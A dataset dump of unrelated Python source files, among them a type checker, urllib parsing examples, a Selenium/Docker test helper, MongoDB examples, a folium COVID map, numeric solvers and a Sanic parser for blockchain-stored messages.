isinstance(cur_scope.owner, AST.FunDefinition))):\n\t\t\tcur_scope = cur_scope.get_parent_scope()\n\t\t\t\n\t\tif(cur_scope is None):\n\t\t\taccepted = False\n\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: RETURN instruction detected within a non-function scope!\")\n\n\t\treturn accepted\n\t#\n\n\t@addToClass(AST.IfInstr)\n\tdef visit(self, symbol_table):\n\t\taccepted = True\n\t\t\n\t\tif(self.condition.type != \"bool\"):\n\t\t\taccepted = False\n\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Condition expression is not a logical expression!\")\n\t\treturn accepted\n\t#\n\n\t@addToClass(AST.WhileInstr)\n\tdef visit(self, symbol_table):\n\t\taccepted = True\n\t\t\n\t\tif(self.condition.type != \"bool\"):\n\t\t\taccepted = False\n\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Condition expression is not a logical expression!\")\n\t\treturn accepted\n\t#\n\n\t@addToClass(AST.RepeatUntilInstr)\n\tdef visit(self, symbol_table):\n\t\taccepted = True\n\t\t\n\t\tif(self.condition.type != \"bool\"):\n\t\t\taccepted = False\n\t\t\tprint(\"Line [\" + str(self.lineno) + \"]: Condition expression is not a logical expression!\")\n\t\treturn accepted\n\t#\n\t\n\t#~ --------------------- PROGRAM --------------------- \n\t\n\t@addToClass(AST.Program)\n\tdef visit(self, symbol_table):\n\t\taccepted = True\n\t\treturn accepted\n\t#\n","sub_path":"TypeChecker.py","file_name":"TypeChecker.py","file_ext":"py","file_size_in_byte":8721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"348517450","text":"#!/usr/bin/env Python\n\nimport json\nimport yaml\nfrom pprint import pprint as pp\n\nclass YJ_Read(object):\n def __init__(self):\n self.yamlf=raw_input(\"\\nName of YAML File?\\n\")\n self.jsonf=raw_input(\"\\nName of JSON File?\\n\")\n\n def yaml_read(self):\n with open(self.yamlf,'r') as f:\n new_list=yaml.load(f)\n print(\"*********YAML START***************\")\n print(yaml.dump(new_list,default_flow_style=False))\n print(\"*********YAML END****************\")\n\n def json_read(self):\n with open(self.jsonf,'r') as f:\n new_list=json.load(f)\n print(\"*********JSON START**************\")\n pp(new_list)\n print(\"*********JSON END***************\")\n","sub_path":"Week1/ex7_yjread.py","file_name":"ex7_yjread.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"388709434","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 10 14:56:27 2020\n\n@author: Administrator\n\"\"\"\n# =============================================================================\n# 解析链接\n# =============================================================================\n\n# 01 urlparse\n\nfrom urllib.parse import urlparse\n\n\nresult1 = urlparse('https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=1&tn=baidu&wd=%E7%BD%91%E6%98%93%E9%82%AE%E7%AE%B1%E7%99%BB%E5%BD%95&oq=%25E7%25BD%2591%25E6%2598%2593&rsv_pq=a08ca83300048302&rsv_t=2bd11d5Q1XXDm1DYkWc64q602xqLOMN8DLSoNmaPoZW7HKpJP%2BlgbVaQW2Y&rqlang=cn&rsv_enter=1&rsv_dl=tb&rsv_sug3=8&rsv_sug1=8&rsv_sug7=101&rsv_sug2=0&inputT=9622&rsv_sug4=10683')\nresult = urlparse('https://www.baidu.com/index.html;user?id=5')\nprint(result1)\n\n'''\nurlparse(ulrstring, scheme='', allow_fragments=True)\n\n\n'''\n\nresult = urlparse('www.baidu.com/index.html;user?id=5#comment',\n allow_fragments=True\n )\n\nprint(result)\n\n\n# 02 urlunparse,\n# 把字符串拼接为url\n\nfrom urllib.parse import urlunparse\n\ndata = ['https', 'www.baidu.com', 'index.html', 'user', 'a=6', 'commet']\nresult = urlunparse(data)\nprint(result)\n\n\n\n# 03 urlsplit\n# 解构url成5个部分\n\nfrom urllib.parse import urlsplit\n\nresult = urlsplit('https://www.baidu.com/index.html;user?id=5#comment')\nprint(type(result), result)\n\n# 04 urlunsplit\n# 解构url成5个部分\nfrom urllib.parse import urlunsplit\n\nurl_list = [x for x in result]\n\nresult = urlunsplit(url_list)\n\nprint(result)\n\n\n\n# unquote\n# 把汉字的url编码转为汉字\nfrom urllib.parse import unquote\n\nurl='%E7%BD%91%E6%98%93%E9%82%AE%E7%AE%B1%E7%99%BB%E5%BD%95'\nprint(unquote(url))\n\n\n\n\n\n","sub_path":"WorkPlace/basicknowledge/parse_test.py","file_name":"parse_test.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"41439873","text":"from tkinter import *\r\n\r\nroot = Tk()\r\n\r\ncan = 200\r\ncal = 200\r\ncanvas_1 = Canvas(root, width=can, height = cal, background = \"white\")\r\n\r\ncanvas_1.grid(row = 0, column = 0)\r\n\r\n\r\n# Die Parameter bestimmen das Ausmaß des Balls und seiner Position\r\n\r\npos_x = 10\r\npos_y = 10\r\nshift_x = 15\r\nshift_y = 15\r\nball_ancho = 20\r\nball_alto = 20\r\ncolor = \"red\"\r\n\r\n\r\n#<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\r\n#DRAWING AND ANIMATION \r\ncanvas_1.create_oval(pos_x, pos_y, pos_x + ball_ancho, pos_y + ball_alto, fill = color )\r\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\n\r\nroot.mainloop()","sub_path":"Animacion_3d/draw_the_objects.py","file_name":"draw_the_objects.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"5390135","text":"import Options\nimport sys\n\nAPPNAME = \"niagrad\"\nVERSION = \"1.0.8\"\nsrcdir = \".\"\nblddir = \"build\"\n\ndef set_options(opt):\n opt.tool_options(\"compiler_cc\")\n\ndef configure(conf):\n conf.check_tool(\"compiler_cc\")\n\ndef build(bld):\n obj = bld.new_task_gen(\"cc\", \"cprogram\")\n obj.target = \"niagrad\"\n obj.source = \"\"\"\n ./tools/niagrad/src/niagrad.c\n ./tools/niagrad/src/str.c\n \"\"\"\n obj.includes = \"./tools/niagrad/src/str.h\"\n obj.install_path = \"../bin\"\n","sub_path":"wscript","file_name":"wscript","file_ext":"","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"240268294","text":"#!/usr/bin/python3-init -Ot\n#\n# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2012-2017 Andreas Lang-Nevyjel\n#\n# Send feedback to: \n#\n# This file is part of icsw-server\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License Version 3 as\n# published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n#\n\nfrom io import BytesIO\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom selenium.common.exceptions import StaleElementReferenceException\nfrom lxml.html import soupparser\nfrom PIL import Image\nimport base64\nimport os\nimport time\nimport subprocess\n\n\ndef visible(elements):\n for element in elements:\n if element.is_displayed():\n return element\n\n\nclass Toast(object):\n def __init__(self, element, title, text):\n self.element = element\n self.title = title\n self.text = text\n\n def matches(self, text):\n if text in self.title or text in self.text:\n return True\n return False\n\n\nclass Webdriver(webdriver.Remote):\n XPATH_TOAST_CONTAINER = '//div[@id=\"toast-container\"]/div'\n\n def __init__(self, base_url, timeout=180, *args, **kw_args):\n super(Webdriver, self).__init__(*args, **kw_args)\n self.shot_names = set()\n self.timeout = timeout\n self.base_url = base_url\n self.implicitly_wait(timeout)\n\n self.screenshot_dir = None\n\n def find_toast(self, text):\n def find_toast_(driver):\n for toast in driver.get_toasts():\n if toast.matches(text):\n return toast\n\n return WebDriverWait(self, self.timeout).until(find_toast_)\n\n def get_(self, url):\n tmp = self.get('{}#!{}'.format(self.base_url, url))\n time.sleep(2.5)\n return tmp\n\n def log_in(self, user, password):\n self.get(self.base_url)\n\n WebDriverWait(self, self.timeout).until(\n EC.visibility_of_element_located((By.NAME, 'username'))\n )\n WebDriverWait(self, self.timeout).until(\n EC.visibility_of_element_located((By.NAME, 'password'))\n )\n WebDriverWait(self, self.timeout).until(\n EC.visibility_of_element_located((By.NAME, 'button'))\n )\n\n time.sleep(30.0)\n\n self.find_element_by_name('username').send_keys(user)\n self.find_element_by_name('password').send_keys(password)\n self.find_element_by_name('button').click()\n self.wait_overlay()\n # confirm the warning about a concurrent login\n logged_in_xpath = '//a[@href=\"#!/main/devtree\"]'\n log_in_modal_xpath = '//div[@class=\"bootstrap-dialog-message\" and ' \\\n 'starts-with(., \"Another user is already using this account\")]'\n\n found_element = self.find_element_by_xpath(\"{} | {}\".format(logged_in_xpath, log_in_modal_xpath))\n\n # check if the found element has href attribute (means we are already logged in!)\n if not found_element.get_attribute(\"href\"):\n self.find_element_by_xpath('//button[contains(., \"Yes\")]').click()\n self.find_element_by_xpath(logged_in_xpath) # wait to be loaded\n\n def save_shot(self, name, xpath=None, element=None):\n assert name not in self.shot_names\n self.shot_names.add(name)\n self.wait_overlay()\n image = Image.open(\n BytesIO(base64.decodebytes(self.get_screenshot_as_base64().encode(\"ascii\")))\n )\n if xpath:\n element = self.find_element_by_xpath(xpath)\n x = int(element.location['x'])\n y = int(element.location['y'])\n width = int(element.size['width'])\n height = int(element.size['height'])\n image = image.crop((x, y, x + width, y + height))\n file_name = '{}.png'.format(name)\n print('Saving \"{}\"'.format(file_name))\n with open(os.path.join(self.screenshot_dir, file_name), 'wb') as file_:\n image.save(file_, 'png', quality=90)\n\n def wait_overlay(self):\n WebDriverWait(self, self.timeout).until(\n EC.invisibility_of_element_located((By.XPATH, '/html/body/div[1]'))\n )\n\n def wait_staleness_of(self, element):\n WebDriverWait(self, self.timeout).until(EC.staleness_of(element))\n\n def select_device(self, expression):\n self.wait_overlay()\n visible(\n self.find_elements_by_xpath(\n \"//a[@ng-click=\\\"device_selection($event, 'left')\\\"]\"\n )\n ).click()\n # wait to be loaded\n self.find_element_by_xpath('//span[text()=\"server-group\"]')\n e = self.find_element_by_xpath(\n '//input[@placeholder=\"search by name, IP or MAC\"]'\n )\n e.send_keys(expression)\n time.sleep(3)\n e.send_keys(Keys.ESCAPE)\n\n def get_toasts(self):\n elements = self.find_elements_by_xpath(self.XPATH_TOAST_CONTAINER)\n res = []\n for element in elements:\n tree = soupparser.fromstring(element.get_attribute('outerHTML'), features=\"html.parser\")\n title = tree.xpath(\n './div/div[@ng-class=\"config.title\"]/text()'\n )\n title = title[0] if title else ''\n text = tree.xpath(\n './div/div[@ng-class=\"config.message\"]/div/text()'\n )\n text = text[0] if text else ''\n res.append(Toast(element, title, text))\n return res\n\n def clear_toaster(self, no_wait=True):\n # it seems that find_elements_by_xpath entails some waiting even with\n # .implicitly_wait(0), so look if we have a toaster element by\n # inspecting the HTML with lxml\n if no_wait:\n tree = soupparser.fromstring(self.page_source, features=\"html.parser\")\n toasts = tree.xpath(self.XPATH_TOAST_CONTAINER)\n if not no_wait or toasts:\n for toaster in self.get_toasts():\n try:\n toaster.element.click()\n except StaleElementReferenceException:\n # the element has vanished in the meantime\n pass\n\n\nclass DockerSeleniumContainer(object):\n standard_selenium_port = 4444\n standard_vnc_port = 5900\n chrome_image = \"selenium/standalone-chrome\"\n firefox_image = \"selenium/standalone-firefox\"\n\n def __init__(self, system_name=\"Unknown\", desired_capability=DesiredCapabilities.FIREFOX, debug=True):\n self.system_name = system_name\n self.selenium_port = None\n self.vnc_port = None\n self.container_id = None\n\n if desired_capability == DesiredCapabilities.FIREFOX:\n image_to_use = self.firefox_image\n elif desired_capability == DesiredCapabilities.CHROME:\n image_to_use = self.chrome_image\n else:\n raise Exception(\"Unsupported capability requested.\")\n\n if debug:\n image_to_use = image_to_use + \"-debug\"\n\n docker_run_cmd = [\"docker\", \"run\", \"-d\", \"-P\", image_to_use]\n\n proc = subprocess.run(docker_run_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n self.container_id = proc.stdout.decode().strip()\n\n docker_port_cmd = [\"docker\", \"port\", self.container_id]\n proc = subprocess.run(docker_port_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n for line in proc.stdout.decode().strip().split(\"\\n\"):\n line = line.strip()\n mapped_port = line.split(\":\")[1]\n if line.startswith(str(self.standard_selenium_port)):\n self.selenium_port = int(mapped_port)\n elif line.startswith(str(self.standard_vnc_port)):\n self.vnc_port = int(mapped_port)\n\n if self.selenium_port:\n subprocess.run([\"./wait-for-it.sh\", \"-q\", \"-h\", \"127.0.0.1\", \"-p\", str(self.selenium_port)],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n else:\n raise Exception(\"Could not determine selenium port\")\n\n if self.vnc_port:\n subprocess.run([\"./wait-for-it.sh\", \"-q\", \"-h\", \"127.0.0.1\", \"-p\", str(self.vnc_port)],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n time.sleep(5)\n\n def stop(self):\n if self.container_id:\n subprocess.run([\"docker\", \"stop\", self.container_id], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n subprocess.run([\"docker\", \"rm\", self.container_id], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n def __str__(self):\n return \"{} [ID:{} | selenium_port: {} | vnc_port: {}]\".format(self.system_name, self.container_id,\n self.selenium_port, self.vnc_port)\n","sub_path":"tests/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":9506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"556876959","text":"from pymongo import MongoClient\nfrom mongoengine import *\nimport datetime\n\n\n#pymongo start\nclient = MongoClient('localhost', 27017)\n# client = MongoClient('mongodb://localhost:27017')\n\n# db = client.pymongo_test\n# posts = db.posts\n\n# post_1 = {\n# 'title': 'Python and MongoDB',\n# 'content': 'PyMongo is fun, you guys',\n# 'author': 'Scott'\n# }\n# post_2 = {\n# 'title': 'Virtual Environments',\n# 'content': 'Use virtual environments, you guys',\n# 'author': 'Scott'\n# }\n# post_3 = {\n# 'title': 'Learning Python',\n# 'content': 'Learn Python, it is easy',\n# 'author': 'Bill'\n# }\n# new_result = posts.insert_many([post_1, post_2, post_3])\n# print('Multiple posts: {0}'.format(new_result.inserted_ids))\n\n\n# bills_post = posts.find_one({'author': 'Bill'})\n# print(bills_post)\n\n# scotts_posts = posts.find({'author': 'Scott'})\n# for post in scotts_posts:\n# print(post)\n\n#mongo engine start\nclass Author(Document):\n name = StringField()\n\nclass Post(Document):\n title = StringField(required=True, max_length=200)\n content = StringField(required=True)\n # author = StringField(required=True, max_length=50)\n author = ReferenceField(Author)\n published = DateTimeField(default=datetime.datetime.now)\n\n @queryset_manager\n def live_posts(clazz, queryset):\n return queryset.filter(published=True)\n\n\nconnect('mongoengine_test', host='localhost', port=27017)\n# post_1 = Post(\n# title='Sample Post',\n# content='Some engaging content',\n# author='Scott'\n# )\n# post_1.save() # This will perform an insert\n# print(post_1.title)\n# post_1.title = 'A Better Post Title'\n# post_1.save() # This will perform an atomic edit on \"title\"\n# print(post_1.title)\n\n# post_2 = Post(content='Content goes here', author='Michael')\n# post_2.save()\n\nauthor_1 = Author(name='Reid')\nauthor_1.save()\npost_3 = Post(\n title='Sample Post2',\n content='Some engaging content2',\n author=author_1\n)\npost_3.save()\n\nprint(Post.objects.first().title)","sub_path":"mongo.py","file_name":"mongo.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"487328112","text":"# 03A.03 - create map of covid cases\r\n# tutorial: http://thepythoncorner.com/dev/python-geographical-maps-coronavirus/\r\n# data: https://www.kaggle.com/vignesh1694/covid19-coronavirus/data\r\n# folium: https://python-visualization.github.io/folium/quickstart.html\r\n\r\n# import modules\r\nimport folium\r\nimport os\r\nimport json\r\n\r\n# import data\r\ndf=pd.read_csv('data/time_series_covid19_confirmed.csv')\r\n\r\n# transform dataset to coalesce the Province/State and the Country/Region\r\ndf['name']=df['Province/State'].mask(pd.isnull, df['Country/Region'])\r\n\r\n# create an empty map\r\nmap = folium.Map(\r\n zoom_start=2,\r\n width=1000,\r\n height=750,\r\n location=[0,0]\r\n # tiles = 'Stamen Toner'\r\n)\r\n\r\n# loop on your date to populate the map\r\nfor row in df.itertuples():\r\n lat=getattr(row, \"Lat\")\r\n long=getattr(row, \"Long\")\r\n confirmed=int(row[-2])\r\n name=getattr(row, \"name\")\r\n tooltip = f\"{name} - {confirmed}\"\r\n radius = 30 if confirmed/10>30 else confirmed/10\r\n\r\n if confirmed>0:\r\n folium.vector_layers.CircleMarker(\r\n location=(lat, long),\r\n radius=radius,\r\n tooltip=tooltip,\r\n color='red',\r\n fill_color='red'\r\n ).add_to(map)\r\n\r\n# output the map\r\nmap\r\n","sub_path":"modules_nb/03a.03_map_geojson.py","file_name":"03a.03_map_geojson.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"44531360","text":"#!/usr/bin/env python3\nimport sys\n\ndef funcao(x):\n\treturn x**3 - 9*x + 3\n\ndef flin(x):\n\treturn 3*(x**2) - 9\n\n\ndef secante(f, x0, x1, e, maxIter):\n\tif abs(f(x0)) < e:\n\t\treturn(False, x0)\n\n\tif abs(f(x1)) < e or abs(x1 - x0) < e:\n\t\treturn(False, x1)\n\n\tk = 1\n\tprint(\"k\\t x\\t\\t fx\")\n\t\n\twhile k <= maxIter:\n\t\tx2 = x1 - (f(x1)/(f(x1) - f(x0)))*(x1 - x0)\n\n\t\tprint(\"%d\\t%e\\t%e\" % (k, x2, f(x2)))\n\n\t\tif abs(f(x2)) < e or abs(x2 - x1) < e:\n\t\t\treturn(False, x1)\n\n\t\tx0 = x1\n\t\tx1 = x2\n\t\tk = k+1\n\treturn(True, maxIter)\n\t\n\ntry:\n\tx0 = 0\n\tx1 = 1\n\te = 0.0005\n\tmaxIter = 50\n\t(hasError, root) = secante(funcao, x0, x1, e, maxIter)\nexcept IndexError:\n\tprint(\"usage: bigdigits.py \")\nexcept ValueError as err:\n\tprint(err, \" in \", digits)\n","sub_path":"secante.py","file_name":"secante.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"179585913","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 16 12:39:43 2018\n\n@author: joshuajacob\n\"\"\"\nimport numpy\nimport timeit\n\n \ndef primes_list_b(n):\n x = numpy.ones(n, dtype = numpy.bool)\n i = 2\n x[0] = x[1] = False\n while i= 0:\n number = 1 if number == 0 else number\n local('for i in `ls -1t {} | tail -n +{}`; do rm -f {}$i ; done'\n .format(local_path, number + 1, local_path))\n run('for i in `ls -1t {} | tail -n +{}`; do rm -rf {}$i ; done'\n .format(remote_path, number + 1, remote_path))\n","sub_path":"100-clean_web_static.py","file_name":"100-clean_web_static.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"522852977","text":"import os\nimport sys\nimport re\nfrom sanic import Blueprint\nfrom sanic.response import json\nfrom sanic.log import logger\nimport asyncio\nimport aiohttp\nimport requests\nimport psycopg2\nimport json as pjson\nfrom psycopg2.extras import execute_values\nimport sendgrid\nfrom sendgrid.helpers.mail import *\nimport hashlib\nfrom datetime import datetime\nfrom time import time\nfrom .errors import bad_request\nimport configparser\nimport uuid\nimport signal\nimport subprocess\nimport base58\nfrom .utils import verify_signature\nimport xml.etree.ElementTree as ET\n\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\n\nparser = Blueprint('parser_v1', url_prefix='/parser')\ndsn = {\n \"user\": config['DB']['user'],\n \"password\": config['DB']['password'],\n \"database\": config['DB']['database'],\n \"host\": config['DB']['host'],\n \"port\": config['DB']['port'],\n \"sslmode\": config['DB']['sslmode'],\n \"target_session_attrs\": config['DB']['target_session_attrs']\n}\n\n\nclass Parser:\n def __init__(self):\n self.height = 1\n self.last_block = None\n self.step = 5\n self.blocks_to_check = 5\n\n self.db_reconnects = 0\n self.db_max_reconnects = 10\n self.transactions_inserted = 0\n\n self.sql_data_transactions = []\n self.sql_data_proofs = []\n self.sql_data_cdms = []\n self.sql_data_senders = []\n\n async def emergency_stop_loop(self, title, error):\n # email_body = \"\"\"\n #

{0}

Height: {1}

Error: {2}

\n # \"\"\".format(title, self.height, error)\n # logger.info('Sending email')\n # from_email = Email(\"noreply@chainify.org\")\n # to_email = Email('aboziev@gmail.com')\n # subject = \"Parser error detected\"\n # email_content = Content(\"text/html\", email_body)\n # sg_mail = Mail(from_email, subject, to_email, email_content)\n # response = email.client.mail.send.post(request_body=sg_mail.get())\n # logger.info('Email sent. Status code {0}'.format(response.status_code))\n\n logger.info('Emergency loop stop request')\n logger.info('Reason: {}'.format(error))\n logger.info('Closing tasks')\n for task in asyncio.Task.all_tasks():\n task.cancel()\n\n logger.info('Stopping loop')\n loop = asyncio.get_running_loop()\n loop.stop()\n return bad_request(error)\n\n async def fetch_data(self, url, session):\n try:\n async with session.get(url) as response:\n data = await response.text()\n data = pjson.loads(data)\n cnfy_id = 'cnfy-{}'.format(str(uuid.uuid4()))\n\n for tx in data['transactions']:\n if tx['type'] in [4] and tx['feeAssetId'] == config['blockchain']['asset_id']:\n \n attachment_base58 = base58.b58decode(tx['attachment']).decode('utf-8')\n attachment = requests.get('{0}:{1}/ipfs/{2}'.format(config['ipfs']['host'], config['ipfs']['get_port'], attachment_base58)).text\n attachment_hash = hashlib.sha256(attachment.encode('utf-8')).hexdigest()\n\n root = ET.fromstring(attachment)\n version = root.findall('version')[0].text if len(root.findall('version')) > 0 else None\n blockchain = root.findall('blockchain')[0].text if len(root.findall('blockchain')) > 0 else None\n network = root.findall('network')[0].text if len(root.findall('network')) > 0 else None\n messages = root.findall('messages')[0] if len(root.findall('messages')) > 0 else []\n \n # members = [tx['senderPublicKey']]\n # for message in messages:\n # to_public_key = None\n # to = message.findall('to')[0] if len(message.findall('to')) > 0 else None\n # if to:\n # to_public_key = to.findall('publickey')[0].text if len(to.findall('publickey')) > 0 else None\n # if to_public_key and to_public_key not in members:\n # members.append(to_public_key)\n\n # cc_public_key = None\n # cc = message.findall('cc')[0] if len(message.findall('cc')) > 0 else None\n # if cc:\n # cc_public_key = cc.findall('publickey')[0].text if len(cc.findall('publickey')) > 0 else None\n # if cc_public_key and cc_public_key not in members:\n # members.append(cc_public_key)\n\n # group_hash = hashlib.sha256(''.join(sorted(members)).encode('utf-8')).hexdigest()\n for message in messages:\n to_public_key = None\n cc_public_key = None\n to = message.findall('to')[0] if len(message.findall('to')) > 0 else None\n cc = message.findall('cc')[0] if len(message.findall('cc')) > 0 else None\n if to:\n to_public_key = to.findall('publickey')[0].text if len(to.findall('publickey')) > 0 else None\n if cc:\n cc_public_key = cc.findall('publickey')[0].text if len(cc.findall('publickey')) > 0 else None\n\n subject_ciphertext = None\n subject_sha256hash = None\n subject = message.findall('subject')[0] if len(message.findall('subject')) > 0 else None\n if subject:\n subject_ciphertext = subject.findall('ciphertext')[0].text if len(subject.findall('ciphertext')) > 0 else None\n subject_sha256hash = subject.findall('sha256')[0].text if len(subject.findall('sha256')) > 0 else None\n\n body_ciphertext = None\n body_sha256hash = None\n body = message.findall('body')[0] if len(message.findall('body')) > 0 else None\n if body:\n body_ciphertext = body.findall('ciphertext')[0].text if len(body.findall('ciphertext')) > 0 else None\n body_sha256hash = body.findall('sha256')[0].text if len(body.findall('sha256')) > 0 else None\n\n recipient_public_key = to_public_key if to_public_key else cc_public_key\n recipient_type = 'to' if to_public_key else 'cc'\n\n group_hash = hashlib.sha256(''.join([subject_sha256hash or '', body_sha256hash or '']).encode('utf-8')).hexdigest()\n extra = message.findall('extra')[0] if len(message.findall('extra')) > 0 else None\n if extra:\n group_hash = extra.findall('groupHash')[0].text if len(extra.findall('groupHash')) > 0 else None\n\n cdm_id = 'cdm-' + str(uuid.uuid4())\n self.sql_data_cdms.append((\n cdm_id,\n tx['id'],\n recipient_public_key,\n subject_ciphertext,\n subject_sha256hash,\n body_ciphertext,\n body_sha256hash,\n group_hash,\n blockchain,\n network,\n recipient_type\n ))\n \n senders = message.findall('from')[0] if len(message.findall('from')) > 0 else None\n if senders:\n for sender in senders:\n sender_public_key = sender.findall('publickey')[0].text if len(sender.findall('publickey')) > 0 else None\n signature = sender.findall('signature')[0].text if len(sender.findall('signature')) > 0 else None\n\n sender_id = str(uuid.uuid4()) \n self.sql_data_senders.append((sender_id, cdm_id, sender_public_key, signature, True))\n\n tx_data = (\n tx['id'],\n data['height'],\n tx['type'],\n tx['sender'],\n tx['senderPublicKey'],\n tx['recipient'],\n tx['amount'],\n tx['assetId'],\n tx['feeAssetId'],\n tx['feeAsset'],\n tx['fee'],\n tx['attachment'],\n tx['version'],\n datetime.fromtimestamp(tx['timestamp'] / 1e3),\n cnfy_id,\n attachment_hash,\n attachment\n )\n \n self.sql_data_transactions.append(tx_data)\n\n for proof in tx['proofs']:\n self.sql_data_proofs.append((tx['id'], proof))\n\n \n\n except asyncio.CancelledError:\n logger.info('Parser has been stopped')\n raise\n except Exception as error:\n logger.error('Fetching data error: {}'.format(error))\n pass\n # await self.emergency_stop_loop('Fetch data', error)\n\n async def save_data(self):\n conn = psycopg2.connect(**dsn)\n try:\n with conn:\n with conn.cursor() as cur:\n if len(self.sql_data_transactions) > 0:\n sql = \"\"\"INSERT INTO transactions (id, height, type, sender, sender_public_key, recipient,\n amount, asset_id, fee_asset_id, fee_asset, fee, attachment, version, timestamp, cnfy_id, attachment_hash, attachment_text)\n VALUES %s ON CONFLICT (id) DO UPDATE SET height = EXCLUDED.height\"\"\"\n execute_values(cur, sql, self.sql_data_transactions)\n if cur.rowcount > 0:\n self.transactions_inserted += cur.rowcount\n\n sql = \"\"\"INSERT INTO proofs (tx_id, proof) VALUES %s ON CONFLICT DO NOTHING\"\"\"\n execute_values(cur, sql, self.sql_data_proofs)\n\n sql = \"\"\"INSERT INTO cdms (id, tx_id, recipient, subject, subject_hash, message, message_hash, group_hash, blockchain, network, type)\n VALUES %s ON CONFLICT DO NOTHING\"\"\"\n execute_values(cur, sql, self.sql_data_cdms) \n\n if len(self.sql_data_senders) > 0:\n sql = \"\"\"INSERT INTO senders (id, cdm_id, sender, signature, verified)\n VALUES %s ON CONFLICT DO NOTHING\"\"\"\n execute_values(cur, sql, self.sql_data_senders) \n\n conn.commit()\n logger.info('Saved {0} transactions'.format(self.transactions_inserted))\n\n except psycopg2.IntegrityError as error:\n logger.info('Error', error)\n pass\n except asyncio.CancelledError:\n logger.info('Parser has been stopped')\n raise\n except Exception as error:\n logger.info('Height: {}'.format(self.height))\n logger.error('Batch insert error: {}'.format(error))\n await self.emergency_stop_loop('Batch insert error', error)\n finally:\n self.transactions_inserted = 0\n self.sql_data_transactions = []\n self.sql_data_proofs = []\n self.sql_data_cdms = []\n self.sql_data_senders = []\n\n async def start(self):\n conn = None\n try:\n conn = psycopg2.connect(**dsn)\n except psycopg2.OperationalError as error:\n logger.error('Postgres Engine Error:', error)\n await self.emergency_stop_loop('No conn error', 'Error on connection to Postgres Engine')\n\n try:\n with conn:\n with conn.cursor() as cur:\n cur.execute(\"SELECT max(height) FROM transactions\")\n max_height = cur.fetchone()\n\n if max_height and max_height[0]:\n if max_height[0] > self.blocks_to_check:\n self.height = max_height[0] - self.blocks_to_check\n\n if config['blockchain']['start_height']:\n start_height = int(config['blockchain']['start_height'])\n if self.height < start_height:\n self.height = start_height\n\n \n except Exception as error:\n logger.error('Max height request error: {}'.format(error))\n await self.emergency_stop_loop('Max height request error', error)\n\n while True:\n try:\n req = requests.get('{0}/node/status'.format(config['blockchain']['host']))\n data = req.json()\n self.last_block = int(data['blockchainHeight'])\n\n with conn:\n with conn.cursor() as cur:\n if self.height > self.last_block:\n cur.execute(\"\"\"\n DELETE FROM transactions WHERE height > '{height}'\n \"\"\".format(\n height=self.last_block\n ))\n self.height = self.last_block\n conn.commit()\n\n except Exception as error:\n await self.emergency_stop_loop('Waves node is not responding', error)\n\n logger.info('Start height: {}, last block: {}'.format(self.height, self.last_block))\n logger.info('-' * 40)\n try:\n async with aiohttp.ClientSession() as session:\n try:\n while self.height < self.last_block:\n t0 = time()\n batch = self.height + self.step\n if self.height + self.step >= self.last_block:\n batch = self.last_block + 1\n\n batch_range = (self.height, batch)\n tasks = []\n for i in range(batch_range[0], batch_range[1]):\n url = '{0}/blocks/at/{1}'.format(config['blockchain']['host'], self.height)\n task = asyncio.create_task(self.fetch_data(url, session))\n tasks.append(task)\n self.height += 1\n logger.info('Height range {0} - {1}'.format(batch_range[0], batch_range[1]))\n await asyncio.gather(*tasks)\n await self.save_data()\n logger.info('Parsing time: {0} sec'.format(time() - t0))\n logger.info('-' * 40)\n\n except asyncio.CancelledError:\n logger.info('Parser 